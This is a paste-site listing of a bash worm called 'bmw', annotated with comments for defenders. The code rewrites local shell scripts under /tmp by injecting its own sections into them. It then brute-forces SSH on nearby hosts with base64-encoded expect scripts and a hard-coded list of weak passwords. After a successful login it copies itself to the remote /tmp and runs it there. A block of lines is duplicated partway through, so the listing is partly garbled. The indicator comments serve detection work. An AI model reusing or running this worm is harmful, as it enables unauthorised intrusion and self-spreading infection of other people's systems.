FlyFar

bmw worm v3.2.0

Feb 26th, 2023
Bash 5.85 KB | Cybersecurity | 0 0
  1. #!/bin/bash
  2. #
  3. # bmw - the big master worm
  4. #
  5. # v320  by wzt  2019
  6. #
  7.  
  8. # bmw_phase1_start
  9. infect_dir="/tmp"                 # root directory that bmw_find_scripts searches for *.sh files
  10. infect_size=10                    # files smaller than this many bytes are skipped
  11. infect_line=4                     # files with fewer lines than this are skipped
  12. infect_max_num=4                  # the search loop stops once infect_num exceeds this value
  13. infect_num=0                      # running count of files modified so far
  14. infect_func_num=2                 # minimum number of function-definition matches a target must have
  15. infect_self_num=5                 # number of the last phase marker whose text is copied into a target
  16. infect_self_name=""               # not referenced anywhere else in this listing
  17. infect_key_words="the big master worm."  # string grepped for to skip already-modified files; also usable as a detection string
  18.  
  19. bmw_find_scripts()
  20. {
          # Local file-modification phase: walks infect_dir for *.sh files and passes
          # each file that clears the filters below to bmw_infect_file.
          # Argument as used below: $1 - forwarded unchanged to bmw_infect_file as the
          # file the copied text is read from.
          # For defenders: the visible effect is unexpected rewrites of shell scripts
          # under infect_dir; searching scripts for the infect_key_words string finds
          # files that were already modified.
  21.     local file file_sz func_num
  22.  
  23.     for file in `find $infect_dir -name "*.sh"`
  24.     do
              # Stop once the per-run cap has been exceeded.
  25.         [ $infect_num -gt $infect_max_num ] && break
  26.  
  27.         file_sz=`wc -c $file |awk '{print $1}'`
  28.         file_line=`wc -l $file |awk '{print $1}'`
  29.  
              # Skip files below the byte-size or line-count thresholds.
  30.         [[ $file_sz -lt $infect_size || $file_line -lt $infect_line ]] && continue
  31.  
              # Count lines that look like function definitions; too few means skip.
  32.         func_num=`grep '^[a-zA-Z0-9_][^"]*()' $file|wc -l`
  33.         [ $func_num -lt $infect_func_num ] && continue
  34.  
              # A file that already contains the marker string is left alone.
  35.         if grep "$infect_key_words" $file >/dev/null; then
  36.             echo "$file has been infected."
  37.             continue
  38.         fi
  39.         echo "<$file_sz $file_line $func_num> infecting $file..."
  40.         bmw_infect_file $1 $file $func_num
  41.         ((infect_num++))
  42.     done
  43. }
  44. # bmw_phase1_end
  45.  
  46. # bmw_phase2_start
  47. bmw_infect_file()
  48. {
          # Picks the function in the target after which text will be placed, then
          # hands off to bmw_extract_body.
          # Arguments as used below: $1 - file the copied text is read from,
          # $2 - target file, $3 - function count computed by bmw_find_scripts.
  49.     local rand_num i j k l
  50.     local phase_s phase_e
  51.  
          # RANDOM%$3 yields 0..$3-1 and 0 is remapped to 1, so the chosen index
          # falls in 1..$3-1.
  52.     rand_num=$((RANDOM%$3))
  53.     if [ $rand_num -eq 0 ]; then
  54.         rand_num=1
  55.     fi
  56.  
  57.     echo "$3 => $rand_num $2"
  58.  
          # Marker names that delimit the region of $1 to copy; the number in the
          # end marker comes from infect_self_num.
  59.     phase_s="bmw_phase1_start"
  60.     phase_e="bmw_phase$infect_self_num""_end"
  61.  
  62.     bmw_extract_body "$1" "$phase_s" "$phase_e" "$2" $rand_num
  63. }
  54.         rand_num=1
  55.     fi
  56.  
  57.     echo "$3 => $rand_num $2"
  58.  
  59.     phase_s="bmw_phase1_start"
  60.     phase_e="bmw_phase$infect_self_num""_end"
  61.  
  62.     bmw_extract_body "$1" "$phase_s" "$phase_e" "$2" $rand_num
  63. }
  64.  
  65. bmw_extract_body()
  66. {
  67.     local shellcode newcode
  68.  
  69.         shellcode=`awk -v phase_start="$2" -v phase_end="$3" 'BEGIN {phase_flag=0;phase_len=0}{if (phase_flag == 1) {phase_array[phase_len]=$0;phase_len++}if ($0 ~ phase_start) {phase_flag=1;phase_array[phase_len]=$0;phase_len++}if ($0 ~ phase_end) {phase_flag=0;}}END {for (i = 0; i < phase_len; i++) print phase_array[i]}' $1`
  70.  
  71.     shellcode1=$(echo "$shellcode"|sed 's/\\/\\\\/g')
  72.     newcode=`awk -v scode="$shellcode1" -v tnum="$5" 'BEGIN {func_flag=0;func_num=0}{if (func_flag == 1) {print $0; if ($0 ~ /^\}/) {func_flag=0;print scode}}else {if ($0 ~ /^[[:alnum:]].*\(\)/) {func_num++;if (func_num == tnum) {func_flag=1;}}print $0}}' $4`
  73.  
  74.     echo -e "$newcode"|sed 's/\\/\\\\/g' >$4.bak
  75.     rm -f $4 && mv $4.bak $4
  76.     chmod +x $4
  77. }
  78. # bmw_phase2_end
  79.  
      # Base64 text that bmw_crack_init decodes into ./scp_crack.exp. The decoded
      # file begins with an expect shebang; bmw_ssh_copy_file runs it to copy a
      # file to a remote host.
  80. scp_crack_exp="IyEvdXNyL2Jpbi9leHBlY3QKCnNldCBJUCBbbGluZGV4ICRhcmd2IDJdCnNldCBVU0VSIFtsaW5k
  81. ZXggJGFyZ3YgMV0Kc2V0IFBBU1NXRCBbbGluZGV4ICRhcmd2IDVdCnNldCBMT0NBTF9GSUxFIFts
  82. aW5kZXggJGFyZ3YgMF0Kc2V0IFRJTUVPVVQgW2xpbmRleCAkYXJndiA0XQpzZXQgdGltZW91dCBb
  83. bGluZGV4ICRhcmd2IDRdCnNldCBSRU1PVEVfUEFUSCBbbGluZGV4ICRhcmd2IDNdCgpzcGF3biBz
  84. Y3AgLW8gU2VydmVyQWxpdmVJbnRlcnZhbD0kVElNRU9VVCAtbyBDb25uZWN0VGltZW91dD0kVElN
  85. RU9VVCAgJExPQ0FMX0ZJTEUgJFVTRVJAJElQOiRSRU1PVEVfUEFUSApleHBlY3QgewoJIih5ZXMv
  86. bm8pIiB7IHNlbmQgInllc1xyIjsgZXhwX2NvbnRpbnVlIH0KCSIqYXNzd29yZDoiIHsgc2VuZCAi
  87. JFBBU1NXRFxyIiB9CgkiUGFzc3dvcmQgZm9yIiB7IHNlbmQgIiRQQVNTV0RcciIgfQoJIk5hbWUg
  88. b3Igc2VydmljZSBub3Qga25vd24iIHsgZXhpdCAxfQoJIk5vIHJvdXRlIHRvIGhvc3QiIHsgZXhp
  89. dCAyIH0KCSJDb25uZWN0aW9uIHJlZnVzZWQiIHsgZXhpdCA5IH0KCSJMYXN0IGxvZ2luOiIgeyBl
  90. eGl0IDN9Cgl0aW1lb3V0IHsgZXhpdCA0IH0KCWVvZiB7IGV4aXQgMCB9Cn0KCmV4cGVjdCB7CiAg
  91. ICAgICAgIiphc3N3b3JkOiIgeyBleGl0IDUgfQoJIlBhc3N3b3JkIGZvciIgeyBleGl0IDggfQog
  92. ICAgICAgIGVvZiB7IGV4aXQgMCB9Cn0K"
  93.  
      # Base64 text that bmw_crack_init decodes into ./ssh_crack.exp. The decoded
      # file also begins with an expect shebang; bmw_ssh_crack and
      # bmw_ssh_copy_file run it and act on its exit code.
  94. ssh_crack_exp="IyEvdXNyL2Jpbi9leHBlY3QKCnNldCBJUCBbbGluZGV4ICRhcmd2IDBdCnNldCBVU0VSIFtsaW5k
  95. ZXggJGFyZ3YgMV0Kc2V0IFBBU1NXRCBbbGluZGV4ICRhcmd2IDJdCnNldCBDTUQgW2xpbmRleCAk
  96. YXJndiAzXQpzZXQgVElNRU9VVCBbbGluZGV4ICRhcmd2IDRdCnNldCB0aW1lb3V0IFtsaW5kZXgg
  97. JGFyZ3YgNF0KCnNwYXduIC1ub2VjaG8gc3NoIC1vIFNlcnZlckFsaXZlSW50ZXJ2YWw9JFRJTUVP
  98. VVQgLW8gQ29ubmVjdFRpbWVvdXQ9JFRJTUVPVVQgLXQgJFVTRVJAJElQICRDTUQKZXhwZWN0IHsK
  99. CSIoeWVzL25vKSIgeyBzZW5kICJ5ZXNcciI7IGV4cF9jb250aW51ZSB9CgkiKmFzc3dvcmQ6IiB7
  100. IHNlbmQgIiRQQVNTV0RcciIgfQoJIlBhc3N3b3JkIGZvciIgeyBzZW5kICIkUEFTU1dEXHIiIH0K
  101. CSJOYW1lIG9yIHNlcnZpY2Ugbm90IGtub3duIiB7IGV4aXQgMX0KCSJObyByb3V0ZSB0byBob3N0
  102. IiB7IGV4aXQgMiB9CgkiQ29ubmVjdGlvbiByZWZ1c2VkIiB7IGV4aXQgOSB9CgkiQ29ubmVjdGlv
  103. biByZXNldCBieSBwZWVyIiB7ZXhpdCA5fQoJdGltZW91dCB7IGV4aXQgNCB9Cgllb2YgeyBleGl0
  104. IDEwIH0KfQoKZXhwZWN0IHsKICAgICAgICAiKmFzc3dvcmQ6IiB7IGV4aXQgNSB9CgkiUGFzc3dv
  105. cmQgZm9yIiB7IGV4aXQgOCB9CiAgICAgICAgInVpZD0iIHsgZXhpdCAxMDAgfQoJIipdJCIgeyBl
  106. eGl0IDEwMCB9CgkiKl0jIiB7IGV4aXQgMTAwIH0KCSIqJCIgeyBleGl0IDEwMCB9CgkiKiMiIHsg
  107. ZXhpdCAxMDAgfQoJIkxhc3QgbG9naW46IiB7IGV4aXQgMTAwIH0KICAgICAgICBlb2YgeyBleGl0
  108. IDcgfQp9Cg=="
  109.  
       # Hard-coded account names and password candidates that bmw_ssh_crack tries
       # in order. They only succeed against hosts that accept SSH password logins
       # with one of these weak values; sshd settings such as
       # "PasswordAuthentication no" and "PermitRootLogin no" remove that
       # precondition.
  110. ssh_crack_user=("root" "wzt")
  111. ssh_crack_passwd=("123456" "111" "giveshell" "afafa" "afafdfafdf")
  112.  
  113. bmw_ssh_copy_file()
  114. {
           # Copies a file to the remote host's /tmp with scp_crack.exp and, if that
           # exits 0, runs it there through ssh_crack.exp.
           # Arguments as used below: $1 - remote address, $2 - local file path.
           # $user and $passwd are not parameters of this function; they appear to
           # come from the caller's local variables in bmw_ssh_crack.
           # For defenders: on the receiving host this shows up as a new file in
           # /tmp followed by an SSH session whose command is "cd /tmp;<file>".
           # Mounting /tmp noexec is a common hardening step against running files
           # dropped there.
  115.     ./scp_crack.exp $2 $user $1 "/tmp" 4 $passwd
  116.     [ $? -ne 0 ] && return
  117.     ./ssh_crack.exp $1 $user $passwd "cd /tmp;$2" 4
  118. }
  119.  
  120. bmw_ssh_crack()
  121. {
           # Tries every pair from ssh_crack_user and ssh_crack_passwd against one
           # host by running ssh_crack.exp and reading its exit code.
           # Arguments as used below: $1 - remote address, $2 - file path forwarded
           # to bmw_ssh_copy_file after a successful login.
           # For defenders: each attempt is a separate SSH password authentication,
           # so the target's sshd log shows a short burst of failed logins for the
           # listed accounts from one source address. Rate limiting or lockout on
           # repeated failures interrupts the loop.
  122.     local user passwd ret
  123.  
  124.     for user in ${ssh_crack_user[*]}
  125.     do
  126.         for passwd in ${ssh_crack_passwd[*]}
  127.         do
  128.             ./ssh_crack.exp $1 $user $passwd "" 4
  129.             ret=$?
  130.             echo -e "\nretcode: $ret\n"
                   # Exit code 100 is treated as a successful login; the meaning of
                   # each code is defined inside the encoded expect script.
  131.             if [ $ret -eq 100 ]; then
  132.                 echo -ne "\ttrying $user => $passwd\t[success]\n"
  133.                 bmw_ssh_copy_file $1 $2 $user $passwd
  134.                 return
                   # Exit code 9 abandons the remaining passwords for this user.
  135.             elif [ $ret -eq 9 ]; then
  136.                 break;
  137.             else
  138.                 echo -ne "\ttrying $user => $passwd\t[failed]\r"
  139.             fi
  140.         done
  141.     done
  142. }
  143.  
  144. bmw_crack_init()
  145. {
           # Checks that an expect binary exists in some PATH directory, then writes
           # the two encoded helper scripts into the current working directory.
           # Returns 1 when expect is not found, 0 otherwise.
           # For defenders: files named ssh_crack.exp and scp_crack.exp appearing
           # with the execute bit set, and expect being spawned by a shell script,
           # are host-level indicators. On a host without expect the network phase
           # stops here.
  146.     local bin old_ifs flag=0
  147.  
           # Split PATH on ':' and look for a regular file named expect in each entry.
  148.     old_ifs=$IFS; IFS=':'
  149.     for bin in $PATH
  150.     do
  151.         [ -f $bin/expect ] && flag=1
  152.     done
  153.     IFS=$old_ifs
  154.  
  155.     [ $flag -ne 1 ] && return 1
  156.  
  157.     echo "$ssh_crack_exp"|base64 -d >ssh_crack.exp
  158.     [ -f ssh_crack.exp ] && chmod +x ssh_crack.exp
  159.  
  160.     echo "$scp_crack_exp"|base64 -d >scp_crack.exp
  161.     [ -f scp_crack.exp ] && chmod +x scp_crack.exp
  162.     return 0
  163. }
  164.  
  165. bmw_infect_net()
  166. {
           # Network phase: derives a /24 prefix from the SSH_CONNECTION environment
           # variable, probes host numbers 136 through 138 in it, and calls
           # bmw_ssh_crack for each one that answers on TCP port 22.
           # Argument as used below: $1 - file path forwarded to bmw_ssh_crack.
           # For defenders: the local address is taken only from SSH_CONNECTION, so
           # the prefix is empty when the script is not started inside an SSH
           # session. The port check uses bash's built-in /dev/tcp redirection, so
           # no scanner binary shows up in process listings; the observable signal
           # is a server sending ICMP echo requests and opening TCP/22 connections
           # to neighbours in its own subnet.
  167.     local local_ip host ip
  168.  
           # Third field of SSH_CONNECTION, then its first three octets.
  169.     local_ip=`env|grep -i SSH_CONNECTION|awk '{print $3}'`
  170.     host=`echo $local_ip|cut -d '.' -f 1-3`
  171.  
  172.     bmw_crack_init
  173.     [ $? -eq 1 ] && return 1
  174.  
  175.     for ((i = 136; i <= 138; i++))
  176.     do
  177.         ip="$host.$i"
  178.         echo -e "ping $ip"
  179.  
               # Never target the address this host is using.
  180.         [ "$local_ip" == "$ip" ] && continue
  181.  
  182.         ping -W 1 -c 1 $ip >/dev/null
  183.         [ $? -eq 1 ] && continue
  184.  
               # Open and then close descriptor 254 on port 22 as a reachability test.
  185.         exec 254<> /dev/tcp/$ip/22
  186.         [ $? -ne 0 ] && continue
  187.         echo "$ip port 22 is open."
  188.         exec 254<&-; exec 254>&-
  189.  
  190.         bmw_ssh_crack "$ip" $1
  191.     done
  192.  
  193. }
  194.  
  195. # bmw_phase5_start
  196. #bmw_find_scripts $0
       # Entry point. As pasted, the call to the local file-modification phase is
       # commented out and only the network phase runs, with $0 (this script's own
       # path) as the file to copy to remote hosts.
  197. bmw_infect_net $0
  198. # bmw_phase5_end
Tags: BMW